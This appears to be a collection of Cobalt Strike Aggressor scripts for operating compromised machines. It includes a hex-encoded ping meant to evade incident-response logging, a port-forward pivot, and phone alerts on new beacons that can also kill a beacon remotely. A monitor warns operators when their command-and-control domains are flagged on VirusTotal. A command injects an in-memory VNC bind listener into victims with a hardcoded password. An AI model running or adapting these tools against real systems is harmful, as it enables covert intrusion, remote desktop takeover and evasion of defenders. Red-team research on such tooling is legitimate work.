3 | # 4 | # Author: @vysecurity 5 | 6 | alias ping { 7 | # $1 - Self 8 | # $2 - IP 9 | 10 | if ($2){ 11 | $ip = $2; 12 | ($p1,$p2,$p3,$p4) = split("\\.", $ip); 13 | 14 | if ((int($p1) >= 0) && (int($p1) <= 255) && (int($p2) >= 0) && (int($p2) <= 255) && (int($p3) >= 0) && (int($p3) <= 255) && (int($p4) >= 0) && (int($p4) <= 255)){ 15 | # Correct IP at this bit 16 | 17 | $p1h = formatNumber($p1, 10, 16); 18 | $p2h = formatNumber($p2, 10, 16); 19 | $p3h = formatNumber($p3, 10, 16); 20 | $p4h = formatNumber($p4, 10, 16); 21 | 22 | $p1hs = "$p1h"; 23 | $p2hs = "$p2h"; 24 | $p3hs = "$p3h"; 25 | $p4hs = "$p4h"; 26 | 27 | if (strlen($p1hs) == 1){ 28 | $p1hs = "0 $+ $p1hs"; 29 | } 30 | if (strlen($p2hs) == 1){ 31 | $p2hs = "0 $+ $p2hs"; 32 | } 33 | if (strlen($p3hs) == 1){ 34 | $p3hs = "0 $+ $p3hs"; 35 | } 36 | if (strlen($p4hs) == 1){ 37 | $p4hs = "0 $+ $p4hs"; 38 | } 39 | 40 | $final = "0x $+ $p1hs $+ $p2hs $+ $p3hs $+ $p4hs"; 41 | 42 | btask($1, "ping $ip $+ : $+ $final"); 43 | bshell($1, "ping $final"); 44 | } 45 | else{ 46 | berror($1, "Invalid IP address"); 47 | } 48 | } 49 | else{ 50 | berror($1, "You must specify an IP address"); 51 | } 52 | } 53 | 54 | beacon_command_register("ping", "Issues Ping on the target after converting it to hex format to avoid some IR.", 55 | "Syntax: ping [IP address]\n" . 
56 | "Issues a ping on the IP address specified after converting it to hex format to avoid some IR logging."); 57 | 58 | -------------------------------------------------------------------------------- /portfwd.cna: -------------------------------------------------------------------------------- 1 | sub _portfwd { 2 | if ($2 eq "stop") { 3 | btask($1, "Tasked session to stop forward to $3"); 4 | call("beacons.pivot_stop_port", $null, $3); 5 | } 6 | else { 7 | btask($1, "Tasked session to forward $3 to $2 $+ : $+ $3"); 8 | call("beacons.portfwd", $null, $1, $2, int($3)); 9 | } 10 | } 11 | 12 | # beacons 13 | beacon_command_register("portfwd", "create a port forward", "Synopsis: portfwd [stop| ]\nCreate a port forward : -> current beacon -> :"); 14 | 15 | alias portfwd { 16 | _portfwd($1, $2, $3); 17 | } 18 | 19 | # ssh sessions 20 | ssh_command_register("portfwd", "create a port forward", "Synopsis: portfwd [stop| ]\nCreate a port forward : -> current beacon -> :"); 21 | 22 | ssh_alias portfwd { 23 | _portfwd($1, $2, $3); 24 | } -------------------------------------------------------------------------------- /pushover-ng.cna: -------------------------------------------------------------------------------- 1 | # This script adds basic pushover functionality to Cobalt Strike 2 | # Ensure that you configure the pushover users in pushover-cs, ensure it is executeable 3 | # @Und3rf10w 4 | # Modded by @vysecurity 5 | 6 | $location = "https://"; 7 | $uri = "/URI"; 8 | $token = ""; 9 | $user = ""; 10 | 11 | import java.net.URLEncoder; 12 | import java.io.BufferedReader; 13 | import java.io.DataOutputStream; 14 | import java.io.InputStreamReader; 15 | import java.net.HttpURLConnection; 16 | import java.net.URL; 17 | 18 | sub sendpost{ 19 | 20 | $url = $1; 21 | $body = $2 . 
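"\r\n";

    $USER_AGENT = "Mozilla/5.0";
    $response = "";

    try {
        $urlobj = [new URL: $url];
        $con = [$urlobj openConnection];
        [$con setRequestProperty: "User-Agent", $USER_AGENT];
        # Set the method once. The original re-set it from $method, which
        # nothing in this file assigns, so setRequestMethod received $null.
        [$con setRequestMethod: "POST"];
        [$con setDoOutput: true];
        [$con connect];

        $wr = [new DataOutputStream: [$con getOutputStream]];
        [$wr writeBytes: $body];
        [$wr flush];
        [$wr close];

        $responseCode = [$con getResponseCode];
        $response = _read_response([$con getInputStream]);
    }
    catch $ex {
        # A failed notification must not abort the event handler that
        # triggered it. $body carries the API token and is never logged.
        elog("[pushover-ng] POST to $url failed: $ex");
    }

    return $response;
}

# Read an InputStream ($1) line by line to EOF into one CRLF-joined string.
# (The original loop stopped at the first blank line; fine for one-line JSON
# replies, but reading to EOF is what callers expect.)
sub _read_response {
    local('$in $line $text');
    $in = [new BufferedReader: [new InputStreamReader: $1]];
    $text = "";
    $line = [$in readLine];
    while ($line !is $null) {
        $text = $text . $line . "\r\n";
        $line = [$in readLine];
    }
    [$in close];
    return $text;
}

sub sendget {
    # $1 - URL to GET
    # Returns the response body, or "" when the request fails.
    local('$url $USER_AGENT $urlobj $con $responseCode $response');
    $url = $1;
    $USER_AGENT = "Mozilla/5.0";
    $response = "";

    try {
        $urlobj = [new URL: $url];
        $con = [$urlobj openConnection];
        [$con setRequestProperty: "User-Agent", $USER_AGENT];
        [$con setRequestMethod: "GET"];
        $responseCode = [$con getResponseCode];
        $response = _read_response([$con getInputStream]);
    }
    catch $ex {
        elog("[pushover-ng] GET $url failed: $ex");
    }

    return $response;
}

on ready {
    elog("Pushover notifications are now configured");
}

#on event_notify {
#    $time = formatDate($2, "yyyy.MM.dd 'at' HH:mm:ss z");
#    pushover("CS:System_Event","$time $+ : $1");
#}

on event_join {
    local('$time');
    $time = formatDate($2, "yyyy.MM.dd 'at' HH:mm:ss z");
    pushover("CS:User_Joined","$time $+ : $1 has joined");
}

on event_action {
    local('$time');
    $time = formatDate($2, "yyyy.MM.dd 'at' HH:mm:ss z");
    pushover("CS:Action_Performed","$time $+ : < $+ $3 $+ >: $1 ");
}

on event_public {
    local('$time');
    $time = formatDate($3, "yyyy.MM.dd 'at' HH:mm:ss z");
    pushover("CS:New_Message","$time $+ : < $+ $1 $+ >: $2 ");
}

on event_quit {
    local('$time');
    $time = formatDate($2, "yyyy.MM.dd 'at' HH:mm:ss z");
    pushover("CS:User_Left","$time $+ : $1 has quit");
}

on ssh_initial {
    pushover("CS:New_SSH", "New SSH Session Received - ID: $1 | Hostname " . binfo($1, "computer"));
}

on profiler_hit {
    pushover("CS:Profiler_Hit","Profiler Hit Received - External: $1 | Internal: $2 | UA: $3 | Email: " . tokenToEmail($5));
}

on web_hit {
    # $1 - method, $2 - URI, $5 - response status
    #
    # Pushover calls $location . $uri . <bid> when an emergency-priority
    # push is acknowledged. That callback is an unauthenticated POST to the
    # team server's web server (answered 404 because nothing is hosted
    # there) and the beacon ID comes straight from the URI, so anyone who
    # can reach the web server and guess $uri plus a beacon ID can exit
    # that beacon. The checks below limit it to real, currently known IDs;
    # an unguessable $uri is still the main control.
    local('$vuri $bid');

    # Sleep's == is numeric, so it is not a reliable string comparison;
    # compare the method and status as strings.
    if ($1 eq "POST" && $5 eq "404 Not Found") {
        $vuri = $2;
        if (left($vuri, strlen($uri)) eq $uri) {
            $bid = strrep($vuri, $uri, "");
            if (($bid ismatch '\d+') && ($bid in beacon_ids())) {
                blog($bid, "[pushover-ng] exit requested via acknowledgement callback");
                bexit($bid);
            }
        }
    }
}

on beacon_initial {
    local('$org $summary');

    # sends the beacon's egress IP to a third party; see getorg()
    $org = getorg(binfo($1, "external"));
    bnote($1, $org);

    $summary = "New Beacon Received - ID: $1 | User: " . binfo($1, "user") . " | Hostname: " . binfo($1, "computer") . " | PID: " . binfo($1,"pid") . " | HOST: " . binfo($1,"host");
    if (-isadmin $1) {
        $summary = $summary . " | ADMIN BEACON";
    }
    $summary = $summary . " | ORG: " . $org . " | IP: " . binfo($1, "external");

    pushover2("CS:New_Beacon", $summary, $1);
    elog("\x039" . $summary);
}

sub pushover {
    # $1 - title, $2 - message
    local('$title $message $body');
    # Form-encode every field: titles and messages are built from beacon
    # metadata and can contain '&', '=' or '+', which would otherwise
    # corrupt the body. Never log $body; it carries the API token.
    $title = [URLEncoder encode: $1, "UTF-8"];
    $message = [URLEncoder encode: $2, "UTF-8"];

    $body = "token=" . $token . "&user=" . $user . "&title=" . $title . "&message=" . $message;

    sendpost("https://api.pushover.net/1/messages.json", $body);
}

sub pushover2 {
    # $1 - title, $2 - message, $3 - beacon ID
    # Emergency-priority push (priority=2). Acknowledging it hits the
    # callback URL, which web_hit above turns into bexit() of $3 -- a
    # one-tap beacon kill, so make sure the operators know that.
    local('$title $message $b $callback $body');
    $title = [URLEncoder encode: $1, "UTF-8"];
    $message = [URLEncoder encode: $2, "UTF-8"];
    $b = $3;
    $callback = [URLEncoder encode: $location . $uri . $b, "UTF-8"];

    $body = "callback=" . $callback . "&priority=2&retry=60&expire=10800&token=" . $token . "&user=" . $user . "&title=" . $title . "&message=" . $message;

    sendpost("https://api.pushover.net/1/messages.json", $body);
}

sub getorg {
    # $1 - external IP of the beacon; returns the org name ("" if unknown)
    #
    # OPSEC: this sends the target's egress IP to api.hackertarget.com over
    # plain HTTP from the team server. Remove it, or point it at an internal
    # ASN source, on engagements where that disclosure is unacceptable.
    local('$ip $url $res @fields $asn $range $org');
    $ip = $1;
    $url = "http://api.hackertarget.com/aslookup/?q=" . $ip;
    $res = sendget($url);

    @fields = split(',', $res);
    # anything that is not the expected 4-field CSV (errors, empty reply
    # after a failed request) yields an empty org instead of garbage
    if (size(@fields) < 4) {
        return "";
    }
    ($ip, $asn, $range) = @fields;
    # the org name may itself contain commas; keep everything after field 3
    $org = join(',', sublist(@fields, 3));

    $ip = strrep($ip, "\"", "");
    $asn = strrep($asn, "\"", "");
    $range = strrep($range, "\"", "");
    $org = strrep($org, "\"", "");

    #elog("IP: " . $ip);
    #elog("ASN: " . $asn);
    #elog("RANGE: " . $range);
    #elog("ORG: " .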
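# $org);

    return $org;
}

--------------------------------------------------------------------------------
/pushover.cna:
--------------------------------------------------------------------------------
# This script adds basic pushover functionality to Cobalt Strike
# Ensure that you configure the pushover users in pushover-cs, ensure it is executeable
# @Und3rf10w
# Modded by @vysecurity
#
# NOTE(review): $token and $user are Pushover API credentials in clear text
# (this file is in .gitignore for that reason; keep it there).
# $location . $uri is the base of the acknowledgement callback URL handed to
# Pushover; web_hit turns the beacon ID appended to it into a bexit(), so
# $uri should be a long random path, not a guessable one.

$location = "https://";
$uri = "/URI";
$token = "";
$user = "";

import java.net.URLEncoder;
import java.io.BufferedReader;
import java.io.DataOutputStream;
import java.io.InputStreamReader;
import java.net.HttpURLConnection;
import java.net.URL;

sub sendpost {
    # $1 - URL to POST to
    # $2 - form-encoded request body
    # Returns the response body, or "" when the request fails.
    #
    # Fixed: this read $2/$3, but both callers (pushover, pushover2) pass
    # (url, body) as $1/$2 -- the URL was used as the body and the body was
    # empty, so new URL() failed on every call.
    local('$url $body $USER_AGENT $urlobj $con $wr $responseCode $in $inputLine $response');
    $url = $1;
    $body = $2 . "\r\n";

    $USER_AGENT = "Mozilla/5.0";
    $response = "";

    try {
        $urlobj = [new URL: $url];
        $con = [$urlobj openConnection];
        [$con setRequestProperty: "User-Agent", $USER_AGENT];
        # Set the method once. The original re-set it from $method, which is
        # whatever sendget() last left behind ($null before the first GET).
        [$con setRequestMethod: "POST"];
        [$con setDoOutput: true];
        [$con connect];

        $wr = [new DataOutputStream: [$con getOutputStream]];
        [$wr writeBytes: $body];
        [$wr flush];
        [$wr close];

        $responseCode = [$con getResponseCode];

        # read to EOF (the original stopped at the first blank line)
        $in = [new BufferedReader: [new InputStreamReader: [$con getInputStream]]];
        $inputLine = [$in readLine];
        while ($inputLine !is $null) {
            $response = $response . $inputLine . "\r\n";
            $inputLine = [$in readLine];
        }
        [$in close];
    }
    catch $ex {
        # a failed notification must not abort the calling event handler;
        # $body carries the API token and is never logged
        elog("[pushover] POST to $url failed: $ex");
    }

    #elog($method . ": " . $url . ": " .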
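# $responseCode);
    #elog($response);

    return $response;
}

sub sendget {
    # $1 - HTTP method (the only caller, getorg, passes "GET"; the request
    #      is always issued as a GET)
    # $2 - URL
    # Returns the response body, or "" when the request fails.
    local('$method $url $USER_AGENT $urlobj $con $responseCode $in $inputLine $response');
    $method = $1;
    $url = $2;

    $USER_AGENT = "Mozilla/5.0";
    $response = "";

    try {
        $urlobj = [new URL: $url];
        $con = [$urlobj openConnection];
        [$con setRequestProperty: "User-Agent", $USER_AGENT];
        [$con setRequestMethod: "GET"];

        $responseCode = [$con getResponseCode];

        # read to EOF (the original stopped at the first blank line)
        $in = [new BufferedReader: [new InputStreamReader: [$con getInputStream]]];
        $inputLine = [$in readLine];
        while ($inputLine !is $null) {
            $response = $response . $inputLine . "\r\n";
            $inputLine = [$in readLine];
        }
        [$in close];
    }
    catch $ex {
        elog("[pushover] GET $url failed: $ex");
    }

    return $response;
}

on ready {
    elog("Pushover notifications are now configured");
}

#on event_notify {
#    $time = formatDate($2, "yyyy.MM.dd 'at' HH:mm:ss z");
#    pushover("CS:System_Event","$time $+ : $1");
#}

on event_join {
    local('$time');
    $time = formatDate($2, "yyyy.MM.dd 'at' HH:mm:ss z");
    pushover("CS:User_Joined","$time $+ : $1 has joined");
}

on event_action {
    local('$time');
    $time = formatDate($2, "yyyy.MM.dd 'at' HH:mm:ss z");
    pushover("CS:Action_Performed","$time $+ : < $+ $3 $+ >: $1 ");
}

on event_public {
    local('$time');
    $time = formatDate($3, "yyyy.MM.dd 'at' HH:mm:ss z");
    pushover("CS:New_Message","$time $+ : < $+ $1 $+ >: $2 ");
}

on event_quit {
    local('$time');
    $time = formatDate($2, "yyyy.MM.dd 'at' HH:mm:ss z");
    pushover("CS:User_Left","$time $+ : $1 has quit");
}

on ssh_initial {
    pushover("CS:New_SSH", "New SSH Session Received - ID: $1 | Hostname " . binfo($1, "computer"));
}

on profiler_hit {
    pushover("CS:Profiler_Hit","Profiler Hit Received - External: $1 | Internal: $2 | UA: $3 | Email: " . tokenToEmail($5));
}

on web_hit {
    # $1 - method, $2 - URI, $5 - response status
    #
    # Pushover calls $location . $uri . <bid> when an emergency-priority
    # push is acknowledged. That callback is an unauthenticated POST to the
    # team server's web server (answered 404 because nothing is hosted
    # there) and the beacon ID comes straight from the URI, so anyone who
    # can reach the web server and guess $uri plus a beacon ID can exit
    # that beacon. The checks below limit it to real, currently known IDs;
    # an unguessable $uri is still the main control.
    local('$vuri $bid');

    # Sleep's == is numeric, so it is not a reliable string comparison;
    # compare the method and status as strings.
    if ($1 eq "POST" && $5 eq "404 Not Found") {
        $vuri = $2;
        if (left($vuri, strlen($uri)) eq $uri) {
            $bid = strrep($vuri, $uri, "");
            if (($bid ismatch '\d+') && ($bid in beacon_ids())) {
                blog($bid, "[pushover] exit requested via acknowledgement callback");
                bexit($bid);
            }
        }
    }
}

on beacon_initial {
    local('$summary $org');

    $summary = "New Beacon Received - ID: $1 | User: " . binfo($1, "user") . " | Hostname: " . binfo($1, "computer") . " | PID: " . binfo($1,"pid") . " | HOST: " . binfo($1,"host");
    if (-isadmin $1) {
        $summary = $summary . " | ADMIN BEACON";
    }
    pushover2("CS:New_Beacon", $summary, $1);
    elog("\x039" . $summary);

    # sends the beacon's egress IP to a third party; see getorg()
    $org = getorg(binfo($1, "external"));
    bnote($1, $org);
}

sub pushover {
    # $1 - title, $2 - message
    local('$title $message $body');
    # Form-encode every field: titles and messages are built from beacon
    # metadata and can contain '&', '=' or '+', which would otherwise
    # corrupt the body. Never log $body; it carries the API token.
    $title = [URLEncoder encode: $1, "UTF-8"];
    $message = [URLEncoder encode: $2, "UTF-8"];

    $body = "token=" . $token . "&user=" . $user . "&title=" . $title . "&message=" . $message;

    sendpost("https://api.pushover.net/1/messages.json", $body);
}

sub pushover2 {
    # $1 - title, $2 - message, $3 - beacon ID
    # Emergency-priority push (priority=2). Acknowledging it hits the
    # callback URL, which web_hit above turns into bexit() of $3 -- a
    # one-tap beacon kill, so make sure the operators know that.
    local('$title $message $b $callback $body');
    $title = [URLEncoder encode: $1, "UTF-8"];
    $message = [URLEncoder encode: $2, "UTF-8"];
    $b = $3;
    $callback = [URLEncoder encode: $location . $uri . $b, "UTF-8"];

    $body = "callback=" . $callback . "&priority=2&retry=10800&expire=10800&token=" . $token . "&user=" .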
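$user . "&title=" . $title . "&message=" . $message;
    # Removed: elog($body). It wrote the full form body -- including the
    # Pushover API token and user key -- to the event log shared with every
    # operator and kept in the team server logs.

    sendpost("https://api.pushover.net/1/messages.json", $body);
}


sub getorg {
    # $1 - external IP of the beacon; returns the org name ("" if unknown)
    #
    # OPSEC: this sends the target's egress IP to api.hackertarget.com over
    # plain HTTP from the team server. Remove it, or point it at an internal
    # ASN source, on engagements where that disclosure is unacceptable.
    local('$ip $url $res @fields $asn $range $org');
    $ip = $1;
    $url = "http://api.hackertarget.com/aslookup/?q=" . $ip;
    $res = sendget("GET", $url);
    elog("RES: ". $res);

    @fields = split(',', $res);
    # anything that is not the expected 4-field CSV (errors, empty reply
    # after a failed request) yields an empty org instead of garbage
    if (size(@fields) < 4) {
        return "";
    }
    ($ip, $asn, $range) = @fields;
    # the org name may itself contain commas; keep everything after field 3
    $org = join(',', sublist(@fields, 3));

    $ip = strrep($ip, "\"", "");
    $asn = strrep($asn, "\"", "");
    $range = strrep($range, "\"", "");
    $org = strrep($org, "\"", "");

    elog("IP: " . $ip);
    elog("ASN: " . $asn);
    elog("RANGE: " . $range);
    elog("ORG: " . $org);

    return $org;
}

--------------------------------------------------------------------------------
/test.cna:
--------------------------------------------------------------------------------
# test.cna - experiment with the Aggressor dialog API. The callback only
# prints what was submitted; nothing is actually hosted.

sub callback {
    # $1 - dialog, $2 - button pressed, $3 - hash of field values
    println("Dialog was actioned. Button: $2 Values: $3");
}

alias host {
    local('$dialog');
    # note: the default mimetype "text/scriptlet" is not one of the
    # combobox choices below
    $dialog = dialog("Host File", %(uri => "/raw.sct", port => 80, mimetype => "text/scriptlet"), &callback);
    dialog_description($dialog, "Host a file through Cobalt Strike's web server");

    drow_file($dialog, "file", "File:");
    drow_text($dialog, "uri", "Local URI:");
    drow_text($dialog, "host", "Local Host:", 20);
    drow_text($dialog, "port", "Local Port:");
    drow_combobox($dialog, "mimetype", "Mime Type:", @("automatic", "application/octet-stream", "text/html", "text/plain"));

    dbutton_action($dialog, "Launch");
    dbutton_help($dialog, "https://www.cobaltstrike.com/help-host-file");

    dialog_show($dialog);
}

--------------------------------------------------------------------------------
/virustotal-ng.cna:
--------------------------------------------------------------------------------
# VirusTotal Notifications
# Checks VirusTotal for your IOC
#
# NOTE(review): pushover() and vtdomain() below carry "TOKEN"/"USER"/
# "VTAPIKEY" placeholders inline. .gitignore covers virustotal.cna, not this
# file, so a filled-in copy can be committed by accident. Every lookup also
# ties the listener host being checked to the VirusTotal account that owns
# the API key.


import java.net.URLEncoder;
import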
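java.io.BufferedReader;
import java.io.DataOutputStream;
import java.io.InputStreamReader;
import java.net.HttpURLConnection;
import java.net.URL;

# hosts already reported as malicious (so each is pushed only once)
global('@global_maldomains');
@global_maldomains = @();

sub sendhttp {
    # $1 - HTTP method ("GET" or "POST")
    # $2 - URL
    # $3 - request body (POST only)
    # Returns the response body, or "" when the request fails.
    local('$method $url $body $USER_AGENT $urlobj $con $wr $responseCode $in $inputLine $response');
    $method = $1;
    $url = $2;
    $body = $3 . "\r\n";

    $USER_AGENT = "Mozilla/5.0";
    $response = "";

    try {
        $urlobj = [new URL: $url];
        $con = [$urlobj openConnection];
        [$con setRequestMethod: $method];
        [$con setRequestProperty: "User-Agent", $USER_AGENT];

        # Only open an output stream for POST. HttpURLConnection rewrites a
        # GET into a POST as soon as getOutputStream() is called, so the
        # original sent every VirusTotal "GET" as a POST.
        if ($method eq "POST") {
            [$con setDoOutput: true];
            $wr = [new DataOutputStream: [$con getOutputStream]];
            [$wr writeBytes: $body];
            [$wr flush];
            [$wr close];
        }

        $responseCode = [$con getResponseCode];

        # read to EOF (the original stopped at the first blank line)
        $in = [new BufferedReader: [new InputStreamReader: [$con getInputStream]]];
        $inputLine = [$in readLine];
        while ($inputLine !is $null) {
            $response = $response . $inputLine . "\r\n";
            $inputLine = [$in readLine];
        }
        [$in close];
    }
    catch $ex {
        # Deliberately logs neither $url nor the exception text: the
        # VirusTotal URL carries the API key in its query string.
        elog("\cD[VT] $method request failed (HTTP " . $responseCode . ")");
    }

    return $response;
}

sub pushover {
    # $1 - title, $2 - message
    # Credentials are inline placeholders; fill them in but do not commit
    # them. Local so they cannot clobber a $token/$user used elsewhere.
    local('$token $user $title $message $body');
    $token = "TOKEN";
    $user = "USER";
    # form-encode: titles/messages can contain '&', '=' or '+'
    $title = [URLEncoder encode: $1, "UTF-8"];
    $message = [URLEncoder encode: $2, "UTF-8"];

    $body = "token=" . $token . "&user=" . $user . "&title=" . $title . "&message=" . $message;

    sendhttp("POST", "https://api.pushover.net/1/messages.json", $body);
}

sub vtdomain {
    # $1 - host/domain to look up; returns the raw VirusTotal reply.
    # Uses the v2 "url/report" endpoint -- a report lookup, presumably not a
    # scan submission; confirm against the VirusTotal docs before relying
    # on that on an engagement. v2 carries the key in the query string, so
    # never log $url.
    local('$api $domain $params $url');
    $api = "VTAPIKEY";
    $domain = $1;

    $params = "?apikey=" . $api . "&resource=" . [URLEncoder encode: $domain, "UTF-8"];
    $url = "https://www.virustotal.com/vtapi/v2/url/report" . $params;

    return sendhttp("GET", $url, "");
}

sub domains {
    # Collects every listener host plus each entry in the listener's
    # "beacons" list, looks each one up on VirusTotal and returns those
    # with a non-zero positives count.
    local('@domains $listener $info $host @beacon_hosts $bh @vtmaldomains $domain $res');

    @domains = @();
    foreach $listener (listeners()) {
        $info = listener_info($listener);
        $host = $info["host"];
        # `in` is array membership. The original used `isin`, a substring
        # test against the array's string form, which skipped a host that is
        # a substring of one already collected (example.com vs cdn.example.com).
        if ($host !in @domains) {
            add(@domains, $host, -1);
        }
        @beacon_hosts = split(", ", $info["beacons"]);
        foreach $bh (@beacon_hosts) {
            if ($bh !in @domains) {
                add(@domains, $bh, -1);
            }
        }
    }

    @vtmaldomains = @();
    foreach $domain (@domains) {
        $res = vtdomain($domain);
        if ("{\"scan_id\"" isin $res) {
            # host has a VirusTotal report
            if ("\"positives\": 0" isin $res) {
                elog("\cD[VT] Clean: \c9" . $domain);
            }
            else {
                add(@vtmaldomains, $domain, -1);
            }
        }
        else {
            elog("\cD[VT] Not found: \c9" . $domain);
        }
    }

    return @vtmaldomains;
}

on heartbeat_10m {
    # Every 10 minutes, every listener host is sent to VirusTotal; with many
    # hosts this may exceed the quota of the API key in use.
    local('@maldom $domain');
    @maldom = domains();

    foreach $domain (@maldom) {
        if ($domain !in @global_maldomains) {
            add(@global_maldomains, $domain, -1);
            elog("\cD[VT] New malicious domain added: \c4" . $domain);
            pushover("[VT] " . $domain . " MALICIOUS", $domain .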
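" is classed as malicious");
        }
    }
}



on ready {
    elog("VirusTotal notifications are now configured");
}

--------------------------------------------------------------------------------
/vnc-psh.cna:
--------------------------------------------------------------------------------
# Provides GUI around Invoke-VNC by @artkond
# https://github.com/artkond/Invoke-Vnc
#
# Author: @vysecurity
#
# Security notes:
# - The VNC password is passed on the PowerShell command line: it is visible
#   to command-line / script block auditing on the host and is echoed into
#   the beacon log by blog() below. Change the default before use.
# - "-ConType bind" opens a listening port on the target; anyone who can
#   reach it and knows the password gets the desktop. Tear it down when done.

$Port = '5900';
$Password = 'SuperMan123';

sub vnc-settings {
    # $1 - beacon ID. Opens the settings dialog; "Run" injects Invoke-Vnc.
    local('$bid $dialog');
    $bid = $1;

    # $bid is captured into the lambda explicitly. The original relied on a
    # global $bid, so opening a second dialog before submitting the first
    # would have run the first against the wrong beacon.
    $dialog = dialog("Invoke-VNC Settings", %(sPort => $Port, sPassword => $Password), lambda({
        local('$command');
        # remember the last-used settings as the next dialog's defaults
        $Port = $3['sPort'];
        $Password = $3['sPassword'];
        if ($2 eq 'Run') {
            btask($bid, "Injecting VNC into memory");
            bpowershell_import($bid, script_resource("Invoke-Vnc.ps1"));
            # Plain concatenation: "$+" inside a string swallows the spaces
            # around it (see "ping $ip $+ : $+ $final" in ping.cna), which
            # looks like it produced "-Port5900"-style arguments here.
            $command = "Invoke-Vnc -ConType bind -Port " . $3['sPort'] . " -Password " . $3['sPassword'];
            bpowershell($bid, $command);
            blog($bid, "Connect to the machine on port " . $3['sPort'] . " using the password: " . $3['sPassword']);
        }
    }, $bid => $bid));

    dialog_description($dialog, "Specify Port and Password for VNC Bind. Make sure architecture of current PID matches OS.");
    drow_text($dialog, "sPort", "Bind Port:");
    drow_text($dialog, "sPassword", "Password:");

    dbutton_action($dialog, "Run");
    dbutton_action($dialog, "Cancel");
    dialog_show($dialog);
}

# Inject VNC into memory
alias vnc-psh {
    # $2 / $3 are optional and pre-fill the dialog, as the registered
    # synopsis already promises; the original ignored them.
    if ($2) {
        $Port = $2;
    }
    if ($3) {
        $Password = $3;
    }
    vnc-settings($1);
}

beacon_command_register("vnc-psh", "Starts a VNC listener on the machine",
    "Synopsis: vnc-psh [bind port] [password]\n\n" .
    "Starts a VNC listener on the machine. Default Bind Port is 5900. Default password is SuperMan123\r\n" .
    "Architecture of the current process must match the OS.");
--------------------------------------------------------------------------------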